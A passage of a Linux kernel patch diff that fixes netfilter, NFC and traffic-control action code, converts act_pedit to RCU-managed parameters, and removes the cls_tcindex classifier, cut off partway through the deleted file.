+index fc8256b00b320..6023c9f72cdca 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -5487,7 +5487,7 @@ static int nf_tables_getsetelem(struct sk_buff *skb,
+ 	int rem, err = 0;
+ 
+ 	table = nft_table_lookup(net, nla[NFTA_SET_ELEM_LIST_TABLE], family,
+-				 genmask, NETLINK_CB(skb).portid);
++				 genmask, 0);
+ 	if (IS_ERR(table)) {
+ 		NL_SET_BAD_ATTR(extack, nla[NFTA_SET_ELEM_LIST_TABLE]);
+ 		return PTR_ERR(table);
+diff --git a/net/netfilter/nfnetlink.c b/net/netfilter/nfnetlink.c
+index 6d18fb3468683..81c7737c803a6 100644
+--- a/net/netfilter/nfnetlink.c
++++ b/net/netfilter/nfnetlink.c
+@@ -29,6 +29,7 @@
+ 
+ #include <net/netlink.h>
+ #include <net/netns/generic.h>
++#include <linux/netfilter.h>
+ #include <linux/netfilter/nfnetlink.h>
+ 
+ MODULE_LICENSE("GPL");
+@@ -685,12 +686,12 @@ static void nfnetlink_bind_event(struct net *net, unsigned int group)
+ 	group_bit = (1 << group);
+ 
+ 	spin_lock(&nfnl_grp_active_lock);
+-	v = READ_ONCE(net->ct.ctnetlink_has_listener);
++	v = READ_ONCE(nf_ctnetlink_has_listener);
+ 	if ((v & group_bit) == 0) {
+ 		v |= group_bit;
+ 
+ 		/* read concurrently without nfnl_grp_active_lock held. */
+-		WRITE_ONCE(net->ct.ctnetlink_has_listener, v);
++		WRITE_ONCE(nf_ctnetlink_has_listener, v);
+ 	}
+ 
+ 	spin_unlock(&nfnl_grp_active_lock);
+@@ -744,12 +745,12 @@ static void nfnetlink_unbind(struct net *net, int group)
+ 
+ 	spin_lock(&nfnl_grp_active_lock);
+ 	if (!nfnetlink_has_listeners(net, group)) {
+-		u8 v = READ_ONCE(net->ct.ctnetlink_has_listener);
++		u8 v = READ_ONCE(nf_ctnetlink_has_listener);
+ 
+ 		v &= ~group_bit;
+ 
+ 		/* read concurrently without nfnl_grp_active_lock held. */
+-		WRITE_ONCE(net->ct.ctnetlink_has_listener, v);
++		WRITE_ONCE(nf_ctnetlink_has_listener, v);
+ 	}
+ 	spin_unlock(&nfnl_grp_active_lock);
+ #endif
+diff --git a/net/netfilter/xt_length.c b/net/netfilter/xt_length.c
+index 1873da3a945ab..9fbfad13176f0 100644
+--- a/net/netfilter/xt_length.c
++++ b/net/netfilter/xt_length.c
+@@ -30,8 +30,7 @@ static bool
+ length_mt6(const struct sk_buff *skb, struct xt_action_param *par)
+ {
+ 	const struct xt_length_info *info = par->matchinfo;
+-	const u_int16_t pktlen = ntohs(ipv6_hdr(skb)->payload_len) +
+-				 sizeof(struct ipv6hdr);
++	u32 pktlen = skb->len;
+ 
+ 	return (pktlen >= info->min && pktlen <= info->max) ^ info->invert;
+ }
+diff --git a/net/nfc/netlink.c b/net/nfc/netlink.c
+index 1fc339084d897..348bf561bc9fb 100644
+--- a/net/nfc/netlink.c
++++ b/net/nfc/netlink.c
+@@ -1442,7 +1442,11 @@ static int nfc_se_io(struct nfc_dev *dev, u32 se_idx,
+ 	rc = dev->ops->se_io(dev, se_idx, apdu,
+ 			apdu_length, cb, cb_context);
+ 
++	device_unlock(&dev->dev);
++	return rc;
++
+ error:
++	kfree(cb_context);
+ 	device_unlock(&dev->dev);
+ 	return rc;
+ }
+diff --git a/net/sched/Kconfig b/net/sched/Kconfig
+index 777d6b50505cc..03a5abf1a3dae 100644
+--- a/net/sched/Kconfig
++++ b/net/sched/Kconfig
+@@ -503,17 +503,6 @@ config NET_CLS_BASIC
+ 	  To compile this code as a module, choose M here: the
+ 	  module will be called cls_basic.
+ 
+-config NET_CLS_TCINDEX
+-	tristate "Traffic-Control Index (TCINDEX)"
+-	select NET_CLS
+-	help
+-	  Say Y here if you want to be able to classify packets based on
+-	  traffic control indices. You will want this feature if you want
+-	  to implement Differentiated Services together with DSMARK.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called cls_tcindex.
+-
+ config NET_CLS_ROUTE4
+ 	tristate "Routing decision (ROUTE)"
+ 	depends on INET
+diff --git a/net/sched/Makefile b/net/sched/Makefile
+index dd14ef413fdad..b7dbac5c519f6 100644
+--- a/net/sched/Makefile
++++ b/net/sched/Makefile
+@@ -70,7 +70,6 @@ obj-$(CONFIG_NET_CLS_U32)	+= cls_u32.o
+ obj-$(CONFIG_NET_CLS_ROUTE4)	+= cls_route.o
+ obj-$(CONFIG_NET_CLS_FW)	+= cls_fw.o
+ obj-$(CONFIG_NET_CLS_RSVP)	+= cls_rsvp.o
+-obj-$(CONFIG_NET_CLS_TCINDEX)	+= cls_tcindex.o
+ obj-$(CONFIG_NET_CLS_RSVP6)	+= cls_rsvp6.o
+ obj-$(CONFIG_NET_CLS_BASIC)	+= cls_basic.o
+ obj-$(CONFIG_NET_CLS_FLOW)	+= cls_flow.o
+diff --git a/net/sched/act_mpls.c b/net/sched/act_mpls.c
+index 6b26bdb999d77..809f7928a1be6 100644
+--- a/net/sched/act_mpls.c
++++ b/net/sched/act_mpls.c
+@@ -190,40 +190,67 @@ static int tcf_mpls_init(struct net *net, struct nlattr *nla,
+ 	parm = nla_data(tb[TCA_MPLS_PARMS]);
+ 	index = parm->index;
+ 
++	err = tcf_idr_check_alloc(tn, &index, a, bind);
++	if (err < 0)
++		return err;
++	exists = err;
++	if (exists && bind)
++		return 0;
++
++	if (!exists) {
++		ret = tcf_idr_create(tn, index, est, a, &act_mpls_ops, bind,
++				     true, flags);
++		if (ret) {
++			tcf_idr_cleanup(tn, index);
++			return ret;
++		}
++
++		ret = ACT_P_CREATED;
++	} else if (!(flags & TCA_ACT_FLAGS_REPLACE)) {
++		tcf_idr_release(*a, bind);
++		return -EEXIST;
++	}
++
+ 	/* Verify parameters against action type. */
+ 	switch (parm->m_action) {
+ 	case TCA_MPLS_ACT_POP:
+ 		if (!tb[TCA_MPLS_PROTO]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Protocol must be set for MPLS pop");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		if (!eth_proto_is_802_3(nla_get_be16(tb[TCA_MPLS_PROTO]))) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Invalid protocol type for MPLS pop");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		if (tb[TCA_MPLS_LABEL] || tb[TCA_MPLS_TTL] || tb[TCA_MPLS_TC] ||
+ 		    tb[TCA_MPLS_BOS]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Label, TTL, TC or BOS cannot be used with MPLS pop");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		break;
+ 	case TCA_MPLS_ACT_DEC_TTL:
+ 		if (tb[TCA_MPLS_PROTO] || tb[TCA_MPLS_LABEL] ||
+ 		    tb[TCA_MPLS_TTL] || tb[TCA_MPLS_TC] || tb[TCA_MPLS_BOS]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Label, TTL, TC, BOS or protocol cannot be used with MPLS dec_ttl");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		break;
+ 	case TCA_MPLS_ACT_PUSH:
+ 	case TCA_MPLS_ACT_MAC_PUSH:
+ 		if (!tb[TCA_MPLS_LABEL]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Label is required for MPLS push");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		if (tb[TCA_MPLS_PROTO] &&
+ 		    !eth_p_mpls(nla_get_be16(tb[TCA_MPLS_PROTO]))) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Protocol must be an MPLS type for MPLS push");
+-			return -EPROTONOSUPPORT;
++			err = -EPROTONOSUPPORT;
++			goto release_idr;
+ 		}
+ 		/* Push needs a TTL - if not specified, set a default value. */
+ 		if (!tb[TCA_MPLS_TTL]) {
+@@ -238,33 +265,14 @@ static int tcf_mpls_init(struct net *net, struct nlattr *nla,
+ 	case TCA_MPLS_ACT_MODIFY:
+ 		if (tb[TCA_MPLS_PROTO]) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Protocol cannot be used with MPLS modify");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto release_idr;
+ 		}
+ 		break;
+ 	default:
+ 		NL_SET_ERR_MSG_MOD(extack, "Unknown MPLS action");
+-		return -EINVAL;
+-	}
+-
+-	err = tcf_idr_check_alloc(tn, &index, a, bind);
+-	if (err < 0)
+-		return err;
+-	exists = err;
+-	if (exists && bind)
+-		return 0;
+-
+-	if (!exists) {
+-		ret = tcf_idr_create(tn, index, est, a,
+-				     &act_mpls_ops, bind, true, flags);
+-		if (ret) {
+-			tcf_idr_cleanup(tn, index);
+-			return ret;
+-		}
+-
+-		ret = ACT_P_CREATED;
+-	} else if (!(flags & TCA_ACT_FLAGS_REPLACE)) {
+-		tcf_idr_release(*a, bind);
+-		return -EEXIST;
++		err = -EINVAL;
++		goto release_idr;
+ 	}
+ 
+ 	err = tcf_action_check_ctrlact(parm->action, tp, &goto_ch, extack);
+diff --git a/net/sched/act_pedit.c b/net/sched/act_pedit.c
+index a0378e9f01213..7532773283ea7 100644
+--- a/net/sched/act_pedit.c
++++ b/net/sched/act_pedit.c
+@@ -134,6 +134,17 @@ nla_failure:
+ 	return -EINVAL;
+ }
+ 
++static void tcf_pedit_cleanup_rcu(struct rcu_head *head)
++{
++	struct tcf_pedit_parms *parms =
++		container_of(head, struct tcf_pedit_parms, rcu);
++
++	kfree(parms->tcfp_keys_ex);
++	kfree(parms->tcfp_keys);
++
++	kfree(parms);
++}
++
+ static int tcf_pedit_init(struct net *net, struct nlattr *nla,
+ 			  struct nlattr *est, struct tc_action **a,
+ 			  struct tcf_proto *tp, u32 flags,
+@@ -141,10 +152,9 @@ static int tcf_pedit_init(struct net *net, struct nlattr *nla,
+ {
+ 	struct tc_action_net *tn = net_generic(net, act_pedit_ops.net_id);
+ 	bool bind = flags & TCA_ACT_FLAGS_BIND;
+-	struct nlattr *tb[TCA_PEDIT_MAX + 1];
+ 	struct tcf_chain *goto_ch = NULL;
+-	struct tc_pedit_key *keys = NULL;
+-	struct tcf_pedit_key_ex *keys_ex;
++	struct tcf_pedit_parms *oparms, *nparms;
++	struct nlattr *tb[TCA_PEDIT_MAX + 1];
+ 	struct tc_pedit *parm;
+ 	struct nlattr *pattr;
+ 	struct tcf_pedit *p;
+@@ -171,109 +181,125 @@ static int tcf_pedit_init(struct net *net, struct nlattr *nla,
+ 	}
+ 
+ 	parm = nla_data(pattr);
+-	if (!parm->nkeys) {
+-		NL_SET_ERR_MSG_MOD(extack, "Pedit requires keys to be passed");
+-		return -EINVAL;
+-	}
+-	ksize = parm->nkeys * sizeof(struct tc_pedit_key);
+-	if (nla_len(pattr) < sizeof(*parm) + ksize) {
+-		NL_SET_ERR_MSG_ATTR(extack, pattr, "Length of TCA_PEDIT_PARMS or TCA_PEDIT_PARMS_EX pedit attribute is invalid");
+-		return -EINVAL;
+-	}
+-
+-	keys_ex = tcf_pedit_keys_ex_parse(tb[TCA_PEDIT_KEYS_EX], parm->nkeys);
+-	if (IS_ERR(keys_ex))
+-		return PTR_ERR(keys_ex);
+ 
+ 	index = parm->index;
+ 	err = tcf_idr_check_alloc(tn, &index, a, bind);
+ 	if (!err) {
+-		ret = tcf_idr_create(tn, index, est, a,
+-				     &act_pedit_ops, bind, false, flags);
++		ret = tcf_idr_create_from_flags(tn, index, est, a,
++						&act_pedit_ops, bind, flags);
+ 		if (ret) {
+ 			tcf_idr_cleanup(tn, index);
+-			goto out_free;
++			return ret;
+ 		}
+ 		ret = ACT_P_CREATED;
+ 	} else if (err > 0) {
+ 		if (bind)
+-			goto out_free;
++			return 0;
+ 		if (!(flags & TCA_ACT_FLAGS_REPLACE)) {
+ 			ret = -EEXIST;
+ 			goto out_release;
+ 		}
+ 	} else {
+-		ret = err;
++		return err;
++	}
++
++	if (!parm->nkeys) {
++		NL_SET_ERR_MSG_MOD(extack, "Pedit requires keys to be passed");
++		ret = -EINVAL;
++		goto out_release;
++	}
++	ksize = parm->nkeys * sizeof(struct tc_pedit_key);
++	if (nla_len(pattr) < sizeof(*parm) + ksize) {
++		NL_SET_ERR_MSG_ATTR(extack, pattr, "Length of TCA_PEDIT_PARMS or TCA_PEDIT_PARMS_EX pedit attribute is invalid");
++		ret = -EINVAL;
++		goto out_release;
++	}
++
++	nparms = kzalloc(sizeof(*nparms), GFP_KERNEL);
++	if (!nparms) {
++		ret = -ENOMEM;
++		goto out_release;
++	}
++
++	nparms->tcfp_keys_ex =
++		tcf_pedit_keys_ex_parse(tb[TCA_PEDIT_KEYS_EX], parm->nkeys);
++	if (IS_ERR(nparms->tcfp_keys_ex)) {
++		ret = PTR_ERR(nparms->tcfp_keys_ex);
+ 		goto out_free;
+ 	}
+ 
+ 	err = tcf_action_check_ctrlact(parm->action, tp, &goto_ch, extack);
+ 	if (err < 0) {
+ 		ret = err;
+-		goto out_release;
++		goto out_free_ex;
+ 	}
+-	p = to_pedit(*a);
+-	spin_lock_bh(&p->tcf_lock);
+ 
+-	if (ret == ACT_P_CREATED ||
+-	    (p->tcfp_nkeys && p->tcfp_nkeys != parm->nkeys)) {
+-		keys = kmalloc(ksize, GFP_ATOMIC);
+-		if (!keys) {
+-			spin_unlock_bh(&p->tcf_lock);
+-			ret = -ENOMEM;
+-			goto put_chain;
+-		}
+-		kfree(p->tcfp_keys);
+-		p->tcfp_keys = keys;
+-		p->tcfp_nkeys = parm->nkeys;
++	nparms->tcfp_off_max_hint = 0;
++	nparms->tcfp_flags = parm->flags;
++	nparms->tcfp_nkeys = parm->nkeys;
++
++	nparms->tcfp_keys = kmalloc(ksize, GFP_KERNEL);
++	if (!nparms->tcfp_keys) {
++		ret = -ENOMEM;
++		goto put_chain;
+ 	}
+-	memcpy(p->tcfp_keys, parm->keys, ksize);
+-	p->tcfp_off_max_hint = 0;
+-	for (i = 0; i < p->tcfp_nkeys; ++i) {
+-		u32 cur = p->tcfp_keys[i].off;
++
++	memcpy(nparms->tcfp_keys, parm->keys, ksize);
++
++	for (i = 0; i < nparms->tcfp_nkeys; ++i) {
++		u32 cur = nparms->tcfp_keys[i].off;
+ 
+ 		/* sanitize the shift value for any later use */
+-		p->tcfp_keys[i].shift = min_t(size_t, BITS_PER_TYPE(int) - 1,
+-					      p->tcfp_keys[i].shift);
++		nparms->tcfp_keys[i].shift = min_t(size_t,
++						   BITS_PER_TYPE(int) - 1,
++						   nparms->tcfp_keys[i].shift);
+ 
+ 		/* The AT option can read a single byte, we can bound the actual
+ 		 * value with uchar max.
+ 		 */
+-		cur += (0xff & p->tcfp_keys[i].offmask) >> p->tcfp_keys[i].shift;
++		cur += (0xff & nparms->tcfp_keys[i].offmask) >> nparms->tcfp_keys[i].shift;
+ 
+ 		/* Each key touches 4 bytes starting from the computed offset */
+-		p->tcfp_off_max_hint = max(p->tcfp_off_max_hint, cur + 4);
++		nparms->tcfp_off_max_hint =
++			max(nparms->tcfp_off_max_hint, cur + 4);
+ 	}
+ 
+-	p->tcfp_flags = parm->flags;
++	p = to_pedit(*a);
++
++	spin_lock_bh(&p->tcf_lock);
+ 	goto_ch = tcf_action_set_ctrlact(*a, parm->action, goto_ch);
++	oparms = rcu_replace_pointer(p->parms, nparms, 1);
++	spin_unlock_bh(&p->tcf_lock);
+ 
+-	kfree(p->tcfp_keys_ex);
+-	p->tcfp_keys_ex = keys_ex;
++	if (oparms)
++		call_rcu(&oparms->rcu, tcf_pedit_cleanup_rcu);
+ 
+-	spin_unlock_bh(&p->tcf_lock);
+ 	if (goto_ch)
+ 		tcf_chain_put_by_act(goto_ch);
++
+ 	return ret;
+ 
+ put_chain:
+ 	if (goto_ch)
+ 		tcf_chain_put_by_act(goto_ch);
++out_free_ex:
++	kfree(nparms->tcfp_keys_ex);
++out_free:
++	kfree(nparms);
+ out_release:
+ 	tcf_idr_release(*a, bind);
+-out_free:
+-	kfree(keys_ex);
+ 	return ret;
+-
+ }
+ 
+ static void tcf_pedit_cleanup(struct tc_action *a)
+ {
+ 	struct tcf_pedit *p = to_pedit(a);
+-	struct tc_pedit_key *keys = p->tcfp_keys;
++	struct tcf_pedit_parms *parms;
+ 
+-	kfree(keys);
+-	kfree(p->tcfp_keys_ex);
++	parms = rcu_dereference_protected(p->parms, 1);
++
++	if (parms)
++		call_rcu(&parms->rcu, tcf_pedit_cleanup_rcu);
+ }
+ 
+ static bool offset_valid(struct sk_buff *skb, int offset)
+@@ -325,28 +351,30 @@ TC_INDIRECT_SCOPE int tcf_pedit_act(struct sk_buff *skb,
+ 				    struct tcf_result *res)
+ {
+ 	struct tcf_pedit *p = to_pedit(a);
++	struct tcf_pedit_parms *parms;
+ 	u32 max_offset;
+ 	int i;
+ 
+-	spin_lock(&p->tcf_lock);
++	parms = rcu_dereference_bh(p->parms);
+ 
+ 	max_offset = (skb_transport_header_was_set(skb) ?
+ 		      skb_transport_offset(skb) :
+ 		      skb_network_offset(skb)) +
+-		     p->tcfp_off_max_hint;
++		     parms->tcfp_off_max_hint;
+ 	if (skb_ensure_writable(skb, min(skb->len, max_offset)))
+-		goto unlock;
++		goto done;
+ 
+ 	tcf_lastuse_update(&p->tcf_tm);
++	tcf_action_update_bstats(&p->common, skb);
+ 
+-	if (p->tcfp_nkeys > 0) {
+-		struct tc_pedit_key *tkey = p->tcfp_keys;
+-		struct tcf_pedit_key_ex *tkey_ex = p->tcfp_keys_ex;
++	if (parms->tcfp_nkeys > 0) {
++		struct tc_pedit_key *tkey = parms->tcfp_keys;
++		struct tcf_pedit_key_ex *tkey_ex = parms->tcfp_keys_ex;
+ 		enum pedit_header_type htype =
+ 			TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
+ 		enum pedit_cmd cmd = TCA_PEDIT_KEY_EX_CMD_SET;
+ 
+-		for (i = p->tcfp_nkeys; i > 0; i--, tkey++) {
++		for (i = parms->tcfp_nkeys; i > 0; i--, tkey++) {
+ 			u32 *ptr, hdata;
+ 			int offset = tkey->off;
+ 			int hoffset;
+@@ -422,11 +450,10 @@ TC_INDIRECT_SCOPE int tcf_pedit_act(struct sk_buff *skb,
+ 	}
+ 
+ bad:
++	spin_lock(&p->tcf_lock);
+ 	p->tcf_qstats.overlimits++;
+-done:
+-	bstats_update(&p->tcf_bstats, skb);
+-unlock:
+ 	spin_unlock(&p->tcf_lock);
++done:
+ 	return p->tcf_action;
+ }
+ 
+@@ -445,30 +472,33 @@ static int tcf_pedit_dump(struct sk_buff *skb, struct tc_action *a,
+ {
+ 	unsigned char *b = skb_tail_pointer(skb);
+ 	struct tcf_pedit *p = to_pedit(a);
++	struct tcf_pedit_parms *parms;
+ 	struct tc_pedit *opt;
+ 	struct tcf_t t;
+ 	int s;
+ 
+-	s = struct_size(opt, keys, p->tcfp_nkeys);
++	spin_lock_bh(&p->tcf_lock);
++	parms = rcu_dereference_protected(p->parms, 1);
++	s = struct_size(opt, keys, parms->tcfp_nkeys);
+ 
+-	/* netlink spinlocks held above us - must use ATOMIC */
+ 	opt = kzalloc(s, GFP_ATOMIC);
+-	if (unlikely(!opt))
++	if (unlikely(!opt)) {
++		spin_unlock_bh(&p->tcf_lock);
+ 		return -ENOBUFS;
++	}
+ 
+-	spin_lock_bh(&p->tcf_lock);
+-	memcpy(opt->keys, p->tcfp_keys, flex_array_size(opt, keys, p->tcfp_nkeys));
++	memcpy(opt->keys, parms->tcfp_keys,
++	       flex_array_size(opt, keys, parms->tcfp_nkeys));
+ 	opt->index = p->tcf_index;
+-	opt->nkeys = p->tcfp_nkeys;
+-	opt->flags = p->tcfp_flags;
++	opt->nkeys = parms->tcfp_nkeys;
++	opt->flags = parms->tcfp_flags;
+ 	opt->action = p->tcf_action;
+ 	opt->refcnt = refcount_read(&p->tcf_refcnt) - ref;
+ 	opt->bindcnt = atomic_read(&p->tcf_bindcnt) - bind;
+ 
+-	if (p->tcfp_keys_ex) {
+-		if (tcf_pedit_key_ex_dump(skb,
+-					  p->tcfp_keys_ex,
+-					  p->tcfp_nkeys))
++	if (parms->tcfp_keys_ex) {
++		if (tcf_pedit_key_ex_dump(skb, parms->tcfp_keys_ex,
++					  parms->tcfp_nkeys))
+ 			goto nla_put_failure;
+ 
+ 		if (nla_put(skb, TCA_PEDIT_PARMS_EX, s, opt))
+diff --git a/net/sched/act_sample.c b/net/sched/act_sample.c
+index f7416b5598e04..4c670e7568dc6 100644
+--- a/net/sched/act_sample.c
++++ b/net/sched/act_sample.c
+@@ -55,8 +55,8 @@ static int tcf_sample_init(struct net *net, struct nlattr *nla,
+ 					  sample_policy, NULL);
+ 	if (ret < 0)
+ 		return ret;
+-	if (!tb[TCA_SAMPLE_PARMS] || !tb[TCA_SAMPLE_RATE] ||
+-	    !tb[TCA_SAMPLE_PSAMPLE_GROUP])
++
++	if (!tb[TCA_SAMPLE_PARMS])
+ 		return -EINVAL;
+ 
+ 	parm = nla_data(tb[TCA_SAMPLE_PARMS]);
+@@ -80,6 +80,13 @@ static int tcf_sample_init(struct net *net, struct nlattr *nla,
+ 		tcf_idr_release(*a, bind);
+ 		return -EEXIST;
+ 	}
++
++	if (!tb[TCA_SAMPLE_RATE] || !tb[TCA_SAMPLE_PSAMPLE_GROUP]) {
++		NL_SET_ERR_MSG(extack, "sample rate and group are required");
++		err = -EINVAL;
++		goto release_idr;
++	}
++
+ 	err = tcf_action_check_ctrlact(parm->action, tp, &goto_ch, extack);
+ 	if (err < 0)
+ 		goto release_idr;
+diff --git a/net/sched/cls_tcindex.c b/net/sched/cls_tcindex.c
+deleted file mode 100644
+index 6640e75eaa02e..0000000000000
+--- a/net/sched/cls_tcindex.c
++++ /dev/null
+@@ -1,742 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/*
+- * net/sched/cls_tcindex.c	Packet classifier for skb->tc_index
+- *
+- * Written 1998,1999 by Werner Almesberger, EPFL ICA
+- */
+-
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/kernel.h>
+-#include <linux/skbuff.h>
+-#include <linux/errno.h>
+-#include <linux/slab.h>
+-#include <linux/refcount.h>
+-#include <linux/rcupdate.h>
+-#include <net/act_api.h>
+-#include <net/netlink.h>
+-#include <net/pkt_cls.h>
+-#include <net/sch_generic.h>
+-#include <net/tc_wrapper.h>
+-
+-/*
+- * Passing parameters to the root seems to be done more awkwardly than really
+- * necessary. At least, u32 doesn't seem to use such dirty hacks. To be
+- * verified. FIXME.
+- */
+-
+-#define PERFECT_HASH_THRESHOLD	64	/* use perfect hash if not bigger */
+-#define DEFAULT_HASH_SIZE	64	/* optimized for diffserv */
+-
+-
+-struct tcindex_data;
+-
+-struct tcindex_filter_result {
+-	struct tcf_exts		exts;
+-	struct tcf_result	res;
+-	struct tcindex_data	*p;
+-	struct rcu_work		rwork;
+-};
+-
+-struct tcindex_filter {
+-	u16 key;
+-	struct tcindex_filter_result result;
+-	struct tcindex_filter __rcu *next;
+-	struct rcu_work rwork;
+-};
+-
+-
+-struct tcindex_data {
+-	struct tcindex_filter_result *perfect; /* perfect hash; NULL if none */
+-	struct tcindex_filter __rcu **h; /* imperfect hash; */
+-	struct tcf_proto *tp;
+-	u16 mask;		/* AND key with mask */
+-	u32 shift;		/* shift ANDed key to the right */
+-	u32 hash;		/* hash table size; 0 if undefined */
+-	u32 alloc_hash;		/* allocated size */
+-	u32 fall_through;	/* 0: only classify if explicit match */
+-	refcount_t refcnt;	/* a temporary refcnt for perfect hash */
+-	struct rcu_work rwork;
+-};
+-
+-static inline int tcindex_filter_is_set(struct tcindex_filter_result *r)
+-{
+-	return tcf_exts_has_actions(&r->exts) || r->res.classid;
+-}
+-
+-static void tcindex_data_get(struct tcindex_data *p)
+-{
+-	refcount_inc(&p->refcnt);
+-}
+-
+-static void tcindex_data_put(struct tcindex_data *p)
+-{
+-	if (refcount_dec_and_test(&p->refcnt)) {
+-		kfree(p->perfect);
+-		kfree(p->h);
+-		kfree(p);
+-	}
+-}
+-
+-static struct tcindex_filter_result *tcindex_lookup(struct tcindex_data *p,
+-						    u16 key)
+-{
+-	if (p->perfect) {
+-		struct tcindex_filter_result *f = p->perfect + key;
+-
+-		return tcindex_filter_is_set(f) ? f : NULL;
+-	} else if (p->h) {
+-		struct tcindex_filter __rcu **fp;
+-		struct tcindex_filter *f;
+-
+-		fp = &p->h[key % p->hash];
+-		for (f = rcu_dereference_bh_rtnl(*fp);
+-		     f;
+-		     fp = &f->next, f = rcu_dereference_bh_rtnl(*fp))
+-			if (f->key == key)
+-				return &f->result;
+-	}
+-
+-	return NULL;
+-}
+-
+-TC_INDIRECT_SCOPE int tcindex_classify(struct sk_buff *skb,
+-				       const struct tcf_proto *tp,
+-				       struct tcf_result *res)
+-{
+-	struct tcindex_data *p = rcu_dereference_bh(tp->root);
+-	struct tcindex_filter_result *f;
+-	int key = (skb->tc_index & p->mask) >> p->shift;
+-
+-	pr_debug("tcindex_classify(skb %p,tp %p,res %p),p %p\n",
+-		 skb, tp, res, p);
+-
+-	f = tcindex_lookup(p, key);
+-	if (!f) {
+-		struct Qdisc *q = tcf_block_q(tp->chain->block);
+-
+-		if (!p->fall_through)
+-			return -1;
+-		res->classid = TC_H_MAKE(TC_H_MAJ(q->handle), key);
+-		res->class = 0;
+-		pr_debug("alg 0x%x\n", res->classid);
+-		return 0;
+-	}
+-	*res = f->res;
+-	pr_debug("map 0x%x\n", res->classid);
+-
+-	return tcf_exts_exec(skb, &f->exts, res);
+-}
+-
+-
+-static void *tcindex_get(struct tcf_proto *tp, u32 handle)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r;
+-
+-	pr_debug("tcindex_get(tp %p,handle 0x%08x)\n", tp, handle);
+-	if (p->perfect && handle >= p->alloc_hash)
+-		return NULL;
+-	r = tcindex_lookup(p, handle);
+-	return r && tcindex_filter_is_set(r) ? r : NULL;
+-}
+-
+-static int tcindex_init(struct tcf_proto *tp)
+-{
+-	struct tcindex_data *p;
+-
+-	pr_debug("tcindex_init(tp %p)\n", tp);
+-	p = kzalloc(sizeof(struct tcindex_data), GFP_KERNEL);
+-	if (!p)
+-		return -ENOMEM;
+-
+-	p->mask = 0xffff;
+-	p->hash = DEFAULT_HASH_SIZE;
+-	p->fall_through = 1;
+-	refcount_set(&p->refcnt, 1); /* Paired with tcindex_destroy_work() */
+-
+-	rcu_assign_pointer(tp->root, p);
+-	return 0;
+-}
+-
+-static void __tcindex_destroy_rexts(struct tcindex_filter_result *r)
+-{
+-	tcf_exts_destroy(&r->exts);
+-	tcf_exts_put_net(&r->exts);
+-	tcindex_data_put(r->p);
+-}
+-
+-static void tcindex_destroy_rexts_work(struct work_struct *work)
+-{
+-	struct tcindex_filter_result *r;
+-
+-	r = container_of(to_rcu_work(work),
+-			 struct tcindex_filter_result,
+-			 rwork);
+-	rtnl_lock();
+-	__tcindex_destroy_rexts(r);
+-	rtnl_unlock();
+-}
+-
+-static void __tcindex_destroy_fexts(struct tcindex_filter *f)
+-{
+-	tcf_exts_destroy(&f->result.exts);
+-	tcf_exts_put_net(&f->result.exts);
+-	kfree(f);
+-}
+-
+-static void tcindex_destroy_fexts_work(struct work_struct *work)
+-{
+-	struct tcindex_filter *f = container_of(to_rcu_work(work),
+-						struct tcindex_filter,
+-						rwork);
+-
+-	rtnl_lock();
+-	__tcindex_destroy_fexts(f);
+-	rtnl_unlock();
+-}
+-
+-static int tcindex_delete(struct tcf_proto *tp, void *arg, bool *last,
+-			  bool rtnl_held, struct netlink_ext_ack *extack)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r = arg;
+-	struct tcindex_filter __rcu **walk;
+-	struct tcindex_filter *f = NULL;
+-
+-	pr_debug("tcindex_delete(tp %p,arg %p),p %p\n", tp, arg, p);
+-	if (p->perfect) {
+-		if (!r->res.class)
+-			return -ENOENT;
+-	} else {
+-		int i;
+-
+-		for (i = 0; i < p->hash; i++) {
+-			walk = p->h + i;
+-			for (f = rtnl_dereference(*walk); f;
+-			     walk = &f->next, f = rtnl_dereference(*walk)) {
+-				if (&f->result == r)
+-					goto found;
+-			}
+-		}
+-		return -ENOENT;
+-
+-found:
+-		rcu_assign_pointer(*walk, rtnl_dereference(f->next));
+-	}
+-	tcf_unbind_filter(tp, &r->res);
+-	/* all classifiers are required to call tcf_exts_destroy() after rcu
+-	 * grace period, since converted-to-rcu actions are relying on that
+-	 * in cleanup() callback
+-	 */
+-	if (f) {
+-		if (tcf_exts_get_net(&f->result.exts))
+-			tcf_queue_work(&f->rwork, tcindex_destroy_fexts_work);
+-		else
+-			__tcindex_destroy_fexts(f);
+-	} else {
+-		tcindex_data_get(p);
+-
+-		if (tcf_exts_get_net(&r->exts))
+-			tcf_queue_work(&r->rwork, tcindex_destroy_rexts_work);
+-		else
+-			__tcindex_destroy_rexts(r);
+-	}
+-
+-	*last = false;
+-	return 0;
+-}
+-
+-static void tcindex_destroy_work(struct work_struct *work)
+-{
+-	struct tcindex_data *p = container_of(to_rcu_work(work),
+-					      struct tcindex_data,
+-					      rwork);
+-
+-	tcindex_data_put(p);
+-}
+-
+-static inline int
+-valid_perfect_hash(struct tcindex_data *p)
+-{
+-	return  p->hash > (p->mask >> p->shift);
+-}
+-
+-static const struct nla_policy tcindex_policy[TCA_TCINDEX_MAX + 1] = {
+-	[TCA_TCINDEX_HASH]		= { .type = NLA_U32 },
+-	[TCA_TCINDEX_MASK]		= { .type = NLA_U16 },
+-	[TCA_TCINDEX_SHIFT]		= { .type = NLA_U32 },
